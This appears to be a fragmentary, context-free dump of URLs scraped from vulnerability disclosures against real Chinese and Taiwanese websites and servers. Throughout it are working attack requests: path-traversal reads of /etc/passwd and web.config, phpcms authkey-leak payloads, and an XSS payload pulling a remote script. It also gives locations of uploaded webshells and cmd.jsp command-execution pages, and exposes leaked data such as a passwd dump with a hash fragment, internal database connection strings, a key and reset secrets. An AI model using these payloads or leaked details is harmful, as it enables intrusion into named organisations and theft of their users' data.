http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd URL:http://job.pingan.com/ http://idc.jb51.net http://idc.jb51.net/style/info/newview.asp?id=317 http://idc.jb51.net/style/info/newview.asp?id=317 xsst.sinaapp.com/poc/mail_idc.js# now:1437401206072,rootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/",cacheRootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/",cacheJsPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/js/",cacheCssPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/css/",cacheImgPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/img/ http://www.enableq.com/enableq/WebAPI/Down.php?path=Li4vUGVyVXNlckRhdGEvLi4vQ29uZmlnLw==&file=Y29uZmlnLnBocA== http://www.enableq.com/enableq/WebAPI/Down.php?path=Li4vUGVyVXNlckRhdGEvLi4vQ29uZmlnLw==&file=Y29uZmlnLnBocA== http://oa.sxpmg.com/defaultroot/login.jsp http://pm.dhcc.com.cn/DHCPMWeb/ http://112.111.44.94:8080/bankCenter/ www.epie.com.tw/html/jobs.asp http://ski-ana.nwpu.edu.cn/bookingbrow.aspx?ID=2565 http://**.**.**.**:8085/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://**.**.**.**/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://**.**.**.**/Handler/carorroom/ValidCode.ashx?t=NaN&no=1 http://223.85.25.43:7001/gawscx/index.jsp http://223.85.25.43:7001/console http://223.85.25.43:7001/ad http://218.2.31.75:7001/console http://110.249.165.54:7001/netrep/index.jsp http://pic.ziroom.com/oa/iframes/targetReachedCount.html?cache=1422023780531 http://pic.ziroom.com/oa/iframes/perfromanceTop.html?cache=1426254386672 http://hw.gpsisp.com/ http://srm.hikvision.com/Admin/LogOn.html http://www.ctfund.com/message-web/messagesJSON/jsonadd http://oa.gzzb.gd.cn/qy/module/qy/qyxxll/basicInfoview.jsp?result=login<PAToken=MTQ2ODUqVXNlcjNmOGMwYjQwOGU4YioyMjUqUjFGcmFtZXdvcms0LjEuMA== http://oa.gzzb.gd.cn/qy/module/qy/qyxxll/basicInfoview.jsp?result=login<PAToken=MTEzNDYqVXNlcjdkOTEzZWU5OGVjNCoyMjUqUjFGcmFtZXdvcms0LjEuMA== http://qdgl.cttha.com/reportAnalyse/AnalyseReport/index.jsp?pagenum=2&company_id=60&time=20141106070045&token=2bee4a96d05788687c9e4e9d522c8981ab7c02c2&dataId=qc&userid=601&funcid=700017&rep_id=700017 http://passport.xx5.com/findpass/ http://passport.xx5.com/findpass/index.php?a=save_findbyemailconfirm http://www.trendshome.cn/u/list.html?uid=1979 http://myee.jichu.chaoxing.com/ http://222.74.140.54:7001/defaultroot/login.jsp http://218.85.77.165/ http://218.85.77.165/console http://victim:8080/C:%5C/ http://www.nsfocus.net/vulndb/8829 https://www.rapid7.com/resources/advisories/R7-0024.jsp http://www.ahljj.gov.cn/ http://www.ahljj.gov.cn/C:%5C/ http://www.ahljj.gov.cn/D:%5C/ http://www.ahljj.gov.cn/E:%5C/ http://www.nasco.com.cn/ http://tao.admin5.com/yy/install/index.php Webshell:http://tao.admin5.com/yy/cnmh.php http://lian.admin5.com/p.php http://lian.admin5.com/phpmyadmin/ http://113.107.0.77/ http://wx.114menhu.cn/wechat-back/html/main.html http://cksp.eol.cn/scholar_search.php?proftype=9&name=&sex=&do=search&bb_sear.x=25&bb_sear.y=10 http://pop.pindao.com/.git/config http://101.227.241.2:81/pubemg http://bbs.ehang.com/uc_server.zip ftp://183.63.91.4/ ftp://183.63.91.4/backupdata/ ftp://183.63.91.4/backupdata/IT日常运维/ ftp://183.63.91.4/backupdata/万山移动硬盘数据恢复/C/我的文件(2010年以后)/ http://mobile.ztgame.com/.svn/entries http://sygsl.cn/gsl/login.php?gotopage=%2Fgsl%2Findex.php http://124.128.232.167:7001/console/ http://124.128.232.173:7001/console http://124.128.232.247:7004/lpcx/ http://124.128.232.167:7010/autoclaim-srs/LoginServlet http://124.128.232.173:7001/jmxroot/jmxroot.jsp http://124.128.232.167:7001/jmxroot/jmxroot.jsp http://124.128.232.247:7004/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.1.3.26:1521:orcl jdbc:oracle:thin:@10.1.3.52:1521:TESTDEV jdbc:oracle:thin:@10.1.3.1:1521:oradb jdbc:oracle:thin:@10.1.3.1:1521:oradb http://member.ync365.com/register/save)userName处存在SQL注入风险。 http://www.5fengshou.com/sell/info/17923)存在伪静态sql注入,其他Id同样存在。 http://hr.pocib.com/Admin/UpA01.aspx http://hr.pocib.com http://180.153.142.34 http://www.hebdgjh.com.cn/qzlx/sub.asp?cid=0001 http://www.hebdgjh.com.cn/sub.asp?CID=002000010001 http://www.hebdgjh.com.cn/dgsgk%5Csub.asp?CID=00070003 http://www.hebdgjh.com.cn/dgsgk/sgk022.asp?CID=00040001 http://www.hebdgjh.com.cn/dgsgk/sgk023.asp?CID=0002 http://www.hebdgjh.com.cn/dgsgk/sgk02.asp?CID=00030003 http://www.hebdgjh.com.cn/dgsgk/sgk02.asp?CID=0001 http://www.hebdgjh.com.cn/qzlx/sub.asp?cid=0001 http://www.16wifi.com/cms/login.php http://wx.50cms.com/admin/login.aspx hmms.haier.net/appReport/searchReportZdzgKsdCenterInit.action http://a100.aeonlife.com.cn/indexlis.jsp http://www.ebn100.com/customize/nwc_user_enterprise/login/login.html http://**.**.**.**:8083/lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8090/lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8080//lslp/WHOut/Notice/NoticeList.aspx http://**.**.**.**:8083/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8090/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8080/lslp/Sys/View/Notice/ViewNotice.aspx?Id=00000024 http://**.**.**.**:8083/lslp/WHOut/List.aspx?Region=LG http://**.**.**.**:8090/lslp/WHOut/List.aspx?Region=LG http://**.**.**.**:8080/lslp/WHOut/List.aspx?Region=LG http://www.dv10000.com/reportAction.do?method=reportList&departmentId=1 http://cms.diyicai.com/ https://query.thfund.com.cn//thtopic.do?type=-1 http://itsm.baiyunairport.com/test.aspx http://v.huatu.com/htnews/plus/view.php?aid=15323 http://sem.sau.edu.cn/view_list-single.php?id=97 http://a.sxjx.org/login.aspx http://hr.hikvision.com/users/resetPassword.htm?userLogin=153466XXXX@qq.com&secret=4d5d6ef56f1d4aafca653b90beaf9820 http://www.wlmqcg.com.cn/Goods/ViewMemberGood_Info.jsp?good_id=169 http://oa.tempus.cn/ https://github.com/lidudu/sendMail/blob/9b99e90f7c3712036a92b5f674a2d4197885c9c7/src/com/util/mail/TestMail.java http://118.186.217.122/ http://118.186.217.122/cgi-bin/test-cgi http://10.4.24.136/source/ http://m1.yea.im/1pA.png http://m1.yea.im/1pB.png we.renren-inc.com/tongxunlu/ http://we.renren-inc.com/tongxunlu/addressListNote.php?id=1027* https://119.90.56.205/ http://admin.gfxiong.com/login?location=/ http://w.gfxiong.com/wx/lst/product http://w.gfxiong.com/m/login#/m/my http://tjzb.bjes.gov.cn/ReportProcess/ShowErrorpage.aspx?Tab_Type_ID=1&unit_tab_id=79758441X http://114.80.86.70/ http://114.80.86.70/console http://114.80.86.70/cK/foot.jsp http://kszx.jlu.edu.cn/kscj/chaxun_result.php http://www.hebgy.gov.cn/company/index.php?categoryid=29&category=&keyword=&kind2=&pages=1 http://icapture.yoloho.com/Admin/Index/login http://180.97.69.103/querywindow.php?token=8c67d878f4bc809f2a69902fd13de08d&db=xxsw&table=jieqi_system_users&init=1 http://www.multigold.com.cn/ http://member.multigold.com.cn/account/memberInfo_saveMemberAddress?newtime=1437460773098&isDefault=N&address1=%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&fullAddress=%E5%A4%A9%E6%B4%A5%E5%A4%A9%E6%B4%A5%E5%B8%82%E6%9C%9D%E9%98%B3%E5%8C%BA%E4%BA%94%E7%8E%AF%E9%87%8C%E5%B7%A6%E5%AE%B6%E5%BA%84%E3%80%81%E6%96%B0%E6%BA%90%E9%87%8C%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&post=111111&provinceId=12000000&cityId=12010000&areaId=11010200&streetId=11010203&consignee=%E5%95%8A%E5%AE%9E%E6%89%93%E5%AE%9E%E5%A4%A7%E5%B8%88%E7%9A%84&mobile1=13333333331&isDelete=N http://124.193.96.238:8012/userlist.php http://www.ctba.org.tw/download.php下载文件时发现会导向http://www.ctba.org.tw/func_file_download.php?filename=%25E6%2597%2585%25E5%25A4%2596%25E9%2581%25B8%25E6%2589%258B%25E7%25A9%25BA%25E7%2599%25BD%25E5%258D%2594%25E8%25AD%25B0%25E6%259B%25B8%25E8%258B%25B1%25E6%2596%2587%25E7%2589%2588.doc http://www.ctba.org.tw/func_file_download.php?filename=func_file_download.php http://www.ctba.org.tw/func_file_download.php?filename=../func_file_download.php https://www.gzjkp2p.com/querytraninput.do http://m.jb51.net/admin/Article_show.asp?id=69781 http://www.108.com.tw:80/main04/members/search_list_members_parent_case.php?act=memberno&image=&memberno=1 http://system.wecash.net/wecash-system/system/index/ http://www.yongning.gov.cn:8091/ynzw/GscOrgan/index.action存在命令执行漏洞 http://sp.cncico.com:8093/kingeeanc/fileDownloadAction.action存在命令执行漏洞 http://forum.open.com.cn/admin/home/ http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2 http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7 http://182.92.9.185:8080/.svn/entries http://61.144.227.35/main/gb/adminhall/szzwresult.jsp bbs.zjstv.com/wx http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OutPortal_CFD//OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/outportal/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/OnlineQuery/QueryList_Out.aspx?type=Al http://**.**.**.**/bugs/wooyun-2015-0127911 http://ugc.gs.baofeng.com/login?target=%2Fadmin%2Fuser%2Fapply http://cg.csrgc.com.cn/ http://119.18.208.31/ http://221.4.104.217/console http://221.4.104.196/console http://221.4.104.222/console http://221.4.104.222/biz/eDrive/productEAInfo.jsp http://221.4.104.222/aaa/3.jsp http://59.37.35.58/admin/protect http://zzhr.foxconn.com/siteserver/forgetPassword.aspx http://tw.heuet.edu.cn/TP_News_ye.aspx?ID=22208 http://job.efunds.com.cn/solr/#/ http://www.yaolan.com/topic/topic.7z www.ylhrss.gov.cn http://www.ylhrss.gov.cn/login.action https://www.yiban.cn/user/forget/index http://www.yiban.cn/user/reg/checkMobileAjax http://www.yiban.cn/user/forget/modifyPwAjax http://www.kaihuiqu.com/ http://weibo.com/kaihuiqu http://211.139.201.108:81/gdpay/ http://www.qphhyx.com:8009/ http://of××ce.leyou.com https://www.91ri.org/13471.html www.gxczzx.gov.cn http://www.gxczzx.gov.cn/news_list.php?q=2&id=68 http://www.wecash.net/solr/#/ http://**.**.**.**/bugs/wooyun-2015-0127088/trace/d839643b0a8ac106f941bc03414adcf1 http://**.**.**.**/module/zwgk/viewzwxx2.action?websiteid=818&name=flfg&pagenum=1 http://**.**.**.**:86/jxpj/pj_njsd.asp http://**.**.**.**:86//jxpj/pj_njsd.asp http://**.**.**.**//jxpj/pj_njsd.asp http://**.**.**.**/jxpj/pj_njsd.asp http://**.**.**.**/jxpj/pj_xbsd.asp http://**.**.**.**/jxpj/pj_xbsd.asp http://**.**.**.**:86/jxpj/pj_xbsd.asp http://**.**.**.**:86/jxpj/pj_xbsd.asp http://123.15.36.218:8009/yunying/login.action存在命令执行漏洞 http://k3shop.k3cloud.kingdee.com/ http://k3shop.k3cloud.kingdee.com/sitemap.xml www.yczfgjj.com http://116.213.210.136:8888/GlobalWebService.asmx?WSDL http://tempuri.org/GetCount http://116.213.210.136:8888/GlobalWebService.asmx?WSDL http://oa.yhfund.com.cn:8888/logon.action http://oa.yhfund.com.cn/ http://www.tongshifu.com/index.php/forgetpwd/index http://open.haodai.com:80/ http://**.**.**.**:8080/workfield_rg/dirManage_listDirManage.do?fid=E91BAE201BBC4EE09F7D7F1ABB286BE7&deptId=JT&ssdw=%E4%BA%A4%E9%80%9A%E5%B1%80 http://**.**.**.**:8080/workfield_tz/dirManage_listDirManage.do?fid=E608CA06E0704EF49178C17C2E951FF4&deptId=NTS&ssdw=%E5%8F%91%E6%94%B9%E5%A7%94&sign=1 http://**.**.**.**:8080/workfield_hm/dirManage_listDirManage.do?fid=3DEF79130F874CC5B03F639419BC5779&deptId=GT&ssdw=%E5%9B%BD%E5%9C%9F%E5%B1%80 http://114.255.209.12:9989/OL/ http://114.255.209.12:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.160.2.172:1521:topadj"/ http://wyeth.youku.com/admin/admin.php http://wyeth.youku.com/pma/ http://wyeth.youku.com/pma/setup/index.php https://msdn.microsoft.com/en-us/library/ms534622.aspx) http://www.ancc.org.cn/ http://219.232.117.244:7001 http://219.232.117.244:7001/bds http://219.232.117.244:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.30.94:1521/orcl jdbc:oracle:thin:@192.168.30.94:1521/orcl http://wf.nbjj.gov.cn/ http://www.bestv.com.cn/index.php?a=lists&movie_special=1&c=index&tv_category=1&catid=27&m=content&tv_type=1&order=id&channel=2&modelid=11 http://cyjwb.jmu.edu.cn/admin/ASPAdmin_A.asp http://202.108.9.16/logs/ http://202.108.9.127/logs/ http://202.108.16.145:8081/admin/ http://202.108.16.145:8081/manager/ http://202.108.16.145:8090/admin/ http://202.108.16.145:8090/manager/ http://202.108.16.145:9090/manager/ http://202.108.16.145:9090/admin/ http://202.108.16.221:8090/admin/ http://202.108.16.221:8090/manager/ http://202.108.16.221:9090/admin/ http://202.108.16.221:9090/manager/ http://202.108.9.127/.svn/entries www.wooyun.org/bugs/wooyun-2015-0117373 www.7393555.com www.ykgps.net www.gpsfree.net:8000/njnk/ www.7136666.com/ api.ilvxing.com/api/morder/cancel POST:partnerID=ANDROID&version=2.4.0.0&cause=1&unix=20150722&versionCode=2440&sign=【登陆手机端的SIGN】&orderID=70131&plant=YingYongBao http://oa.cr213.com/yyoa/checkWaitdo.jsp?userID=1 http://log.gw.com.cn/ http://210.22.8.98/ http://210.22.8.98/user/manageUser.action?deviceName=&serialNo=&userName=admin http://www.lionfund.com.cn/chatmain.do?id=2403 lbs.bjtelecom.net/besweb/ api.ilvxing.com/api/morder/detail url:http://www.jzhb.gov.cn:8086/jzepb/login.jsp http://www.jzhb.gov.cn:8086/jzepb/js/login.js http://www.cdt.he.cninfo.net/ http://enterprisehw.com/app/install_zh_dev.html http://enterprisehw.com/showlocalnews.php?id=448 http://27.115.105.13:7001/GXReportor/ http://27.115.105.13:7001/GXReportor/jmxroot.jsp jdbc:db2://192.168.8.53:50000 http://111.207.210.120/autoportal/LoginForm.jsp?requestPath=index.jsp http://111.207.210.120/shellinvoker/shellinvoker.jsp http://cj.wyn88.com/ http://**.**.**.**/MyWork/MySet/SysLog.aspx http://**.**.**.**/MyWork/MySet/SysLog http://**.**.**.** http://**.**.**.**:80/MyWork/MySet/SysLog.aspx http://demo.raisedreams.com/buyList.aspx?id=1 http://www.douguo.com/uajax/addDelFriend http://wx.wyn88.com/login.jsp http://220.181.67.230:8081/nexus/index.html http://www.billwang.net/alliance.php?act=alliancecase&corporation=0&page=2 http://wooyun.org/bugs/wooyun-2015-0124425 key:9u8FzRw604sHvvBwGpAmN4myqeprO7T0 http://www.csczj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://admin.hzgwyw.com http://admin.hzgwyw.com/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin y0oWIWQGkvz1HwZLlbF9oKRH0hX0P8L3DddmEQXNXzETClD4ogCwdKQyf0:15822:0:99999:7 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin freeswitch:x:501:501::/home/freeswitch:/bin/bash tcpdump:x:72:72::/:/sbin/nologin jdbc:mysql://10.8.5.12:3306/wyn?autoReconnect=true&autoReconnectForPools=true jdbc:mysql://localhost:3306/wyn?autoReconnect=true&autoReconnectForPools=true jdbc:jtds:sqlserver://192.168.3.125:1433/PmsBusiness_View;useLOBs=false jdbc:jtds:sqlserver://localhost:1433/pms;useLOBs=false http://www.cdanet.org/phpcq/index.php?zid=9 http://www.lianlianpay.com/www.tar.gz http://www.fsspc.com/more.php?u=investor&c=27 http://www.fsspc.com/admin.php http://www.fsspc.com/en/admin.php ed2k://|file|@admin www.coremail.cn/xssl/index_92.aspx?lcid=1 www.coremail.cn www.coremail.cn https://refund.transforex.com.cn/tra/tra/busTaxfreeApplyAction!view.action?id=0000016090 http://crm.openunion.cn/ http://admin.55bbs.com/login.php http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059111280 http://www.qianjing.com/ http://www.qianjing.com/app/qianjingsirenlicai.html http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView https://github.com/search?p=13&q=mogujie.org&ref=searchresults&type=Code&utf8=%E2%9C%93 https://github.com/liuxueyuan https://github.com/liuxueyuan/rubbish/tree/master/im-server-add http://www.cape.cn/301s2008/301sCH/Article_View.asp?id=1623&lmID=3 https://mail.21vianet.com/owa/auth/logon.aspx http://wifi.wyn88.com/ http://58.83.170.103/pe/yong_hu/User_Login.asp http://cs.wyn88.com/ http://211.143.88.98:8000/admin/.svn/entries http://211.143.88.98:8000/common/.svn/entries http://211.143.88.98:8000/js/.svn/entries http://211.143.88.98:8000/.svn/entries http://211.143.88.98:8000/images/.svn/entries http://www.coremail.cn/的用户列表,恰好有个朋友她们用的就是该邮件系统的邮箱,故让其帮忙申请了个内部邮箱,一番测试果然该处存在xss漏洞,触发简单,容易中招。 http://www.yongcheng.com/member/password/find/type/0/initFlag/1 http://www.zgstats.gov.cn/show.php?id=6161&cid=118 http://www.netentsec.com/en/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://wap.wecash.net http://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml http://zyyd.media.open.com.cn/picexam/examshowpic_test.asp?picid=196 http://tongji.weibo.com/apps/index.php/user/check_mail?p_email=test@wooyun.org http://admin.55bbs.com/login.php ftp://218.78.245.3 ftp://218.78.245.7 ftp://218.78.245.13 ftp://218.78.245.29 ftp://218.78.245.75 ftp://218.78.245.85有一些网站源码(webtest目录) ftp://218.78.245.91 ftp://218.78.245.199 http://www.scgrain.gov.cn http://www.hsjyj.gov.cn:8091 http://ajj.ninghai.gov.cn http://www.wsgndj.gov.cn http://jktj.zjwjw.gov.cn http://tzb.ujn.edu.cn http://123.138.77.148/ http://clubapp.qichecdn.com/club4.1/api/group/search?keywords=mm http://www.zofund.com/ st2:2005、2016 http://www.zofund.com/fund/FundPerformance/fundGetChart.do http://homelinktc.sinaapp.com/faq/tc_results.php?type=r&id=3 http://homelinktc.sinaapp.com/faq/tc_results.php?type=r&id=3 http://homelinktc.sinaapp.com/ http://dfsybx.dfmc.com.cn/default.aspx http://qz.pcjoy.cn/topicList.aspx?GT_Id=101#fbtxt http://**.**.**.**:8086/gzcx/yjxgwcx/list.jsp?funType=2 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://113.105.20.107/weixinPlat/pages/weixinprice/WxPriceCalculate.jsp http://113.105.20.107/is/index.jsp http://113.105.20.107/is/cmd.jsp?pwd=023&cmd=arp%20-a http://weixin.allinpay.com/ http://ocs.allinpay.com:8082/ http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.dgsjcy.gov.cn/ http://co.justeasy.cn http://cs.tnet.hk/时代互联某分站 http://cs.tnet.hk/install/index.php http://www.21yod.com/admin/orderyod.html2 www.wufun.net http://wufun.net/upload/head/1437554797291.jsp http://www.ffan.com,首先注册了个账号,下了订单,里面有取消订单的操作。如下: http://www.yongcheng.com/common/pay http://42.96.171.104:8087/data.rar http://www.equaltax.net/ http://admin.equaltax.net/login.htm;jsessionid=61A1295098394490A6148B05D16A6315?admin=login http://bm.ahkj.gov.cn:8080/ahkj/wb/space/LoginAction.do?method=stuentResultLoginPrint&allowNumberId=141010001748313 http://bm.ahkj.gov.cn:8080/ahkj/wb/space/LoginAction.do?method=stuentResultLoginPrint&allowNumberId=141010001748315 http://cards.ecitic.com/shangcheng/ http://www.hxgjj.com/articals.aspx?CatdID=-1&CatID=220 http://www.hxgjj.com/downli.aspx?CatDID=-1&CatID=283&page=1 www.xincheping.com http://www.leiphone.com/ http://dzsw.zsqy.com.cn/websp2/forgetpwd/index http://220.166.160.81:8828/login.html http://www.lygjt.gov.cn/FormData_webMore.aspx?id=383 http://cq.takungpao.com/list.asp?classid=155 http://m.vip.sohu.com/entry https://passport.meituan.com/account/checksignupmobile https://passport.meituan.com/account/check http://m.gongchang.com/resetpwd/ http://chemall.com.cn:80/helpcenter/lawindex.asp?lawtype=%B7%A8%C2%C9 http://joygormusic.ztems.com/,九歌音乐管理系统: http://joygormusic.ztems.com/menu/sysuserrule_loadLogin.action,试了一下,还真有struts2: http://www.zte-s.com.cn/ http://www.zte-s.com.cn/e/master/ http://localhost:86/e/master/login.aspx,貌似需要本地访问 http://www.zte-s.com.cn/e/member/ http://ucoa.uc56.com:8088/Login.aspx http://oa.uc56.com/ http://huawei.hiall.com.cn/cmd.php http://test.cepca.org.cn/Login.aspx http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**//Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://zhongchoucn.org/newsdetail.asp?bid=3&sid=65&xid=&num=325 http://oa.drpeng.com.cn/console/,弱口令binggo! http://www.khpb.gov.tw//main_02.php?page=purchase_d&id=MTM=&type= http://183.63.21.234:3618/Login.asp http://www.qjwsgaj.gov.cn/cjdh/index.php?childid=7349&show=newtab http://119.254.70.128/ http://119.254.70.128/Academy/NewsDisplay01.aspx?UniqNo=5 http://220.181.171.216 www.arts.cuhk.edu.hk/~music/en/people.php?cid=4 http://sfq-o2o.wecash.net/GSH-commercialtenant/login.html http://sfq-o2o.wecash.net/GSH-commercialtenant/index.html http://shop.hebeitc.cn http://119.254.70.121(链家微校) inurl:webmall/query.php http://web.abcde.cn/webmall/query.php?typeid=2 http://www.wenzhangseo.com/demo/webmall/query.php?typeid=2 http://web.yunhosting.com/webmall/query.php?catid=1 http://www.jwz.zzxseo.com/webmall/query.php?catid=9 http://www.wenzhangseo.com/demo/webmall/query.php?typeid=6 http://www.xbuynet.com/webmall/query.php?catid=1 http://site.vhostgo.com/webmall/query.php?catid=3 http://web.yunhosting.com/webmall/query.php?catid=34 http://www.fuling520.com/webmall/query.php?catid=45 http://www.fuling520.com/webmall/query.php?catid=45 http://www.slhot.com/webmall/query.php?typeid=2 http://autosite.idchz.com/webmall/detail.php?id=685 http://www.tfwzjs.com/webmall/query.php?catid=13 http://112.91.98.190:8080/gdczsam/ http://112.91.98.190:8080/cK/foot.jsp https://member.hipiao.com/getpass/ http://www.visionsoft.com.cn/ http://o2o-testing.wecash.net/GSH-shopmanager/login.html http://o2o-testing.wecash.net/GSH-shopmanager/index.html http://www.hbggzy.cn/hubeiyewu_test http://www.hbggzy.cn/hubeiyewu_test/Pages/Thems/EffectImages/686110a4-c7dc-437e-8c0f-f966280637d5.aspx https://github.com/suhuadong888/log_recive/blob/9c62621c46d95f8fa367eb9e86dc954f4df0cec4/src/main/resources.prod/db.properties http://116.114.20.51:7006/eapdomain/login.do?method=begin http://116.114.20.52:6603/console/ http://116.114.20.52:6603/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.48.28.18:1521:db011 http://www.mofine.cn/www.rar http://www.aeonlife.com.cn/product/hotIssue/CVS/Root http://www.aeonlife.com.cn/product/hotIssue/CVS/Entries http://www.aeonlife.com.cn/global/js/.svn/entries http://www.aeonlife.com.cn/mis/global/js/.svn/entries http://www.aeonlife.com.cn:80/ www.aeonlife.com.cn http://webchat.wzbank.cn:7001/console/ http://webchat.wzbank.cn:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@20.1.3.68:1522:caller http://www.rchyzf.com/ http://crswx.wyn88.com/livebot/login http://group.wyn88.com/login/login.action http://ekp.wyn88.com/ http://oa.surfingjs.com/Page/Generic/Login.aspx http://www.xianshu.cn/Reg/gereninfo http://snbook.suning.com/web/index.htm http://snbook.suning.com/m/user/get-other.go?dcode=63561988-258B-4F05-8AE1-4432873410DD&versionCode=201001023&custNo=6073048399 http://snbook.suning.cn/images/portrait/3/20/75/22/39206756229_1436860125361.png","expMin":0,"fanCount":0,"birthday":"2015-04-07"},"result":0 http://h.mama100.com/mobile/login/v2loginActionlogin.action http://gdgltj.com/login.html http://202.96.57.32/ www.ganji.com http://www.tysport.gov.cn inurl:community/g-xx.html http://**.**.**.**//common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**//data/fck/File/1.asa http://**.**.**.**//common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://**.**.**.**//data/fck/1.php http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html 